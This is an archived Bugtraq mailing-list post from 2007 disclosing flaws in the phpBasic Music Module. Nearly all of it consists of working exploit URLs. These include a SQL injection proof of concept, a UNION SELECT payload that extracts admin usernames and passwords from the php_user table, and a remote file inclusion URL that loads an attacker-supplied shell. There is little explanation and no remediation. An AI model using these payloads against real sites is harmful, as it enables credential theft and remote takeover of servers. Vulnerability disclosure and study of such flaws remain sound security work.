Bugtraq mailing list archives
[Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar
From: <pete.houston.17187 () gmail com>
Date: 23 Oct 2007 14:22:26 -0600
Software : phpBasic Music Module Homepage : http://phpbasic.com/ 1. SQL Injection by Xcross87 : Proof of concept : http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection] Xploit admin user account : http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+ 2. RFI by Alucar Xploit : http://victim.com/phpbasic/includes.php?root=[HCE_Shell] === ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ===
Current thread:
- [Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar pete . houston . 17187 (Oct 23)
- <Possible follow-ups>
- [Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar pete.houston.17187 (Oct 23)